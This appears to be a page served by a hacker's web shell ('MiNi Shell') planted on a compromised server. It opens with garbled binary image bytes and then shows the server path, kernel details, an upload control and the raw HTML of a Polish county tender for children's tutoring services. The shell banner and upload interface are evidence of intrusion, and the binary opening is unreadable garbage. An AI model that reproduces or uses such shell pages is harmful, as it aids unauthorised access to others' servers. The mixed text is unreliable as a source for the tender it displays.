JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241010/0053943301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie zajęć wyrównujących szanse edukacyjne – korepetycji z języka polskiego ,języka niemieckiego, języka angielskiego, matematyki, fizyki i chemii </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowe Centrum Pomocy Rodzinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590654486</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jarosława Dąbrowskiego 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piotrków Trybunalski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">44 732 31 64</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">44 732 31 64</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pcpr@powiat-piotkowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">pcprpiotrkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie zajęć wyrównujących szanse edukacyjne – korepetycji z języka polskiego ,języka niemieckiego, języka angielskiego, matematyki, fizyki i chemii </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-56692c4b-88ba-4a1f-8ada-7675234742c1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00539433</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00410175/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Korepetycje - język polski, język niemiecki, język angielski, matematyka, fizyka, chemia w ramach projektu pn. „Rodzina w Centrum”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn. ,,Rodzina w Centrum” współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Łódzkiego 2021 – 2027 Priorytet FELD.07 „Fundusze europejskie dla zatrudnienia i integracji w Łódzkiem” Działanie FELD.0712 „Usługi na rzecz rodziny”. Nr projektu FELD.07.12-IP.01-0035/23 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-56692c4b-88ba-4a1f-8ada-7675234742c1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Niniejsze postępowanie oznaczone jest numerem OR.2321.2.2024. Wykonawcy powinni we wszystkich kontaktach z Zamawiającym powoływać się na wyżej podany numer lub numer ogłoszenia (BZP lub ID postępowania).<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającymi a Wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy e-Zamówienia działającej pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Opisane wSW Z</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">pcprpiotrkow.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Opisany w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Celem zamówienia jest wyłonienie korepetytorów prowadzących indywidualne zajęcia wyrównujące szanse edukacyjne - korepetycje dla dzieci, w ramach projektu pn. „Rodzina <br/>w Centrum” współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Łódzkiego 2021 – 2027 Priorytet FELD.07 „Fundusze europejskie dla zatrudnienia i integracji w Łódzkiem” Działanie FELD.0712 „Usługi na rzecz rodziny” nr projektu FELD.07.12-IP.01-0035/23 z następujących przedmiotów: język polski, język angielski, język niemiecki, matematyka, fizyka i chemia.<br/><br/>2. Celem korepetycji jest pełne zrozumienie i utrwalenie materiału tematycznego z wybranych przedmiotów oraz wypracowanie specjalnych metod pracy dla 52 dzieci.<br/><br/>3. Czas trwania korepetycji – w okresie od 01.11.2024 r. do 31 maja 2027 r. Jedna godzina lekcyjna = 1 godzina zegarowa. Zajęcia prowadzone przez cały rok z przerwą na wakacje (lipiec/sierpień).<br/><br/>4. Zamawiający zastrzega możliwość zwiększenia liczby godzin z przedmiotów. Zmiany te wymagać będą formy Aneksu.<br/><br/>5. Zamawiający zastrzega sobie możliwość wskazania nowej osoby w przypadku, gdy uczestnik korepetycji zrezygnuje z udziału w zajęciach lub zmiany liczby uczestników biorących udział w korepetycjach w trakcie trwania projektu oraz ilości godzin w tygodniu.<br/><br/>6. Zamówienie zostało podzielone przez Zamawiającego następująco:<br/><br/> a Język polski 1 080 godzin: <br/> 1) 80 h w 2024 r. (tj. 10 zajęć x 4 tyg. x 2 m-ce), <br/> 2) 400 h w 2025 r. (tj. 10 zajęć x 4 tyg. x 10 m-cy),<br/> 3) 400 h w 2026 r. (tj. 10 zajęć x 4 tyg. x 10 m-cy),<br/> 4) 200 h w 2027 r. (tj. 10 zajęć x 4 tyg. x 5 m-cy).<br/> b język angielski 3 456 godzin: <br/> 5) 256 h w 2024 r. (tj. 32 zajęć x 4 tyg. x 2 m-ce), <br/> 6) 1280 h w 2025 r. (tj. 32 zajęć x 4 tyg. x 10 m-cy),<br/> 7) 1280 h w 2026 r. (tj. 32 zajęć x 4 tyg. x 10 m-cy),<br/> 8) 640 h w 2027 r. (tj. 32 zajęć x 4 tyg. x 5 m-cy).<br/> c język niemiecki 216 godziny:<br/> 9) 16 h w 2024 r. (tj. 2 zajęcia x 4 tyg. x 2 m-ce), <br/> 10) 80 h w 2025 r. (tj. 2 zajęcia x 4 tyg. x 10 m-cy),<br/> 11) 80 h w 2026 r. (tj. 2 zajęcia x 4 tyg. x 10 m-cy),<br/> 12) 40 h w 2027 r. (tj. 2 zajęcia x 4 tyg. x 5 m-cy).<br/> d matematyka 2808 godzin: <br/> 13) 208 h w 2024 r. (tj. 26 zajęcia x 4 tyg. x 2 m-ce), <br/> 14) 1040 h w 2025 r. (tj. 26 zajęcia x 4 tyg. x 10 m-cy),<br/> 15) 1040 h w 2026 r. (tj. 26 zajęcia x 4 tyg. x 10 m-cy),<br/> 16) 520 h w 2027 r. (tj. 26 zajęcia x 4 tyg. x 5 m-cy).<br/> e fizyka 432 godziny:<br/> 17) 32 h w 2024 r. (tj. 4 zajęcia x 4 tyg. x 2 m-ce), <br/> 18) 160 h w 2025 r. (tj. 4 zajęcia x 4 tyg. x 10 m-cy),<br/> 19) 160 h w 2026 r. (tj. 4 zajęcia x 4 tyg. x 10 m-cy),<br/> 20) 80 h w 2027 r. (tj. 4 zajęcia x 4 tyg. x 5 m-cy).<br/> f chemia 324 godzin:<br/> 21) 24 h w 2024 r. (tj. 3 zajęć x 4 tyg. x 2 m-ce), <br/> 22) 120 h w 2025 r. (tj. 3 zajęć x 4 tyg. x 10 m-cy),<br/> 23) 120 h w 2026 r. (tj. 3 zajęć x 4 tyg. x 10 m-cy),<br/> 24) 60 h w 2027 r. (tj. 3 zajęć x 4 tyg. x 5 m-cy).<br/><br/>Łączna ilość godzin do zrealizowania w latach 2024 -2027 wynosi 8 316 godz.<br/><br/>7. Uczestnicy projektu, skierowani do udziału w korepetycjach, uczęszczają do takich szkół jak: szkoły podstawowe oraz szkoły ponadpodstawowe. Osoba prowadząca zajęcia musi posiadać wiedzę z etapu kształcenia, na którym jest dziecko. Wśród uczestników biorących udział w korepetycjach są również osoby niepełnosprawne.<br/><br/>8. Korepetytorzy będą udzielać korepetycji indywidualnie (Zamawiający nie wyraża zgody na prowadzenie zajęć grupowych). <br/><br/>9. Ten sam korepetytor może udzielać korepetycji zarówno jednej osobie jak i kilku osobom. Może prowadzić zajęcia zarówno z jednego jak i kilku przedmiotów, pod warunkiem, że posiada stosowne uprawnienia i wykształcenie. <br/><br/>10. Z uwagi na fakt, że zamówienie dotyczy pracy z dziećmi i młodzieżą, zgodnie z Ustawą <br/>z dnia 13 maja 2016r. o przeciwdziałaniu zagrożeniu przestępczością na tle seksualnym <br/>i ochronie małoletnich (tj. Dz.U.2023 poz. 1304 ze zm.), Zamawiający nie dopuszcza realizacji zamówienia przez osobę figurującą w Rejestrze Sprawców Przestępstw na tle Seksualnym (RSPTS). Zamawiający nie dopuszcza również realizacji zamówienia przez osobę figurującą <br/>w Krajowym Rejestrze Karnym.<br/><br/>11. Wykonawcy przysługiwać będzie wynagrodzenie jedynie za faktyczne godziny udzielania korepetycji. Zamawiający nie pokrywa żadnych dodatkowo poniesionych kosztów związanych z realizacją przedmiotu zamówienia, w tym kosztów dojazdu.<br/><br/>12. Wykonawca wskaże koordynatora do kontaktów z Zamawiającym. Koordynator będzie miał obowiązek ściśle współpracować z zespołem projektowym, w szczególności kierownikiem projektu i opiekunami uczestników oraz na bieżąco przekazywać informacje <br/>o problemach w realizacji przedmiotu zamówienia w celu wprowadzenia działań naprawczych.<br/><br/>13. Dokładne terminy i godziny udzielania korepetycji ustalane będą na bieżąco z uczestnikami projektu lub ich opiekunami, stosownie do ich tempa pracy oraz czynionych postępów. <br/><br/>14. Wykonawca ma zagwarantować zastępstwo innych osób o równoważnych kwalifikacjach w przypadku nieprzewidzianych okoliczności uniemożliwiających realizację usługi przez osoby wskazane w ofercie, po uzgodnieniu z Zamawiającym.<br/><br/>15. Wykonawca jest zobowiązany do odrobienia godzin zajęć niezrealizowanych w wyniku choroby dziecka, dodatkowych zajęć szkolnych, konsultacji medycznych itp., których nie można było wcześniej przewidzieć. <br/><br/>16. Wykonawca jest zobowiązany do zamieszczania informacji o fakcie współfinansowania projektu z EFS na wszelkiego rodzaju dokumentach, zgodnie z wzorami przekazanymi przez Zamawiającego w tym:<br/>1) na prowadzonej dokumentacji,<br/>2) oraz na wszystkich innych dokumentach nie wymienionych wyżej, które Wykonawca ma obowiązek dostarczyć Zamawiającemu.<br/><br/>17. Korepetycje mają być prowadzone zgodnie z opracowanym przez Wykonawcę i zaakceptowanym przez Zamawiającego harmonogramem. Wykonawca powiadamia Zamawiającego o wszelkich odstępstwach od harmonogramu w ciągu 5 dni po zakończeniu miesiąca informując jednocześnie o ich przyczynach wraz z informacją o terminach odrobienia niezrealizowanych godzin.<br/><br/><br/><br/>18. Zamawiający wymaga:<br/><br/>1) Dostosowania programu nauczania dla każdego uczestnika korepetycji przy uwzględnieniu poziomu wiedzy z danego przedmiotu.<br/><br/>2) Zapewnienia kadry prowadzącej, posiadającej odpowiednie kwalifikacje do przeprowadzenia korepetycji, tj. posiadającej wykształcenie wyższe kierunkowe oraz co najmniej 2 letnim stażem zawodowym związanym z prowadzeniem lekcji z przedmiotów objętych zamówieniem. Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy spełnianiu warunków umożliwiające prowadzenie zajęć. Kwalifikacje i umiejętności wykładowców powinny być adekwatne do zakresu programowego prowadzonych przez nich zajęć. <br/><br/>3) W okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 1 usługę w zakresie prowadzenia korepetycji zgodnych z przedmiotem zamówienia, na którą Wykonawca składa ofertę, kierowanych do dzieci lub młodzieży będących na etapie kształcenia podstawowego lub ponadpodstawowego w wymiarze nie niższym – 3000 godzin.<br/>Przez usługę należy rozumieć umowę na wykonanie usługi pomiędzy Zamawiającym <br/>a Wykonawcą, których należyte wykonanie potwierdzone zostanie przez Wykonawcę stosownymi dokumentami, np. referencjami.<br/>4) Prowadzenia korepetycji w miejscu zamieszkania uczestników projektu w godzinach uzgodnionych z uczestnikami zajęć. Uczestnicy projektu zamieszkują teren powiatu piotrkowskiego. Powiat Piotrkowski obejmuje 11 gmin. Najbliższa gmina od Piotrkowa Trybunalskiego ok 10 km , najdalsza 40 km. Dzieci w rodzinach zastępczych mieszkają prawie w każdej gminie. W cenie zapłaty za godzinę zajęć zawarty jest koszt dojazdu na zajęcia.<br/>5) Prowadzenia ewidencji godzin i dziennika zawierającego tematykę zajęć oraz listę obecności w ramach realizacji zamówienia.<br/><br/>6) W uzasadnionych przypadkach, po uzgodnieniu z Zamawiającym, przeprowadzania korepetycji online za pośrednictwem środków komunikacji na odległość. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311300-5 - Usługi opieki społecznej dla dzieci i młodzieży</p> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80200000-6 - Usługi szkolnictwa średniego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2027-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium Liczba osób prowadzących zajęcia wyrównujące szanse edukacyjne-korepetycje</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „Klauzule społeczne” – zatrudnienie osoby bezrobotnej w ramach realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Opisane w SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Opisane w SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Opisane w SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Opisane w SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> zgodnie z art.128 ustawy pzp <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Opisane w SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Opisane w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Opisany w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e - zamowienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com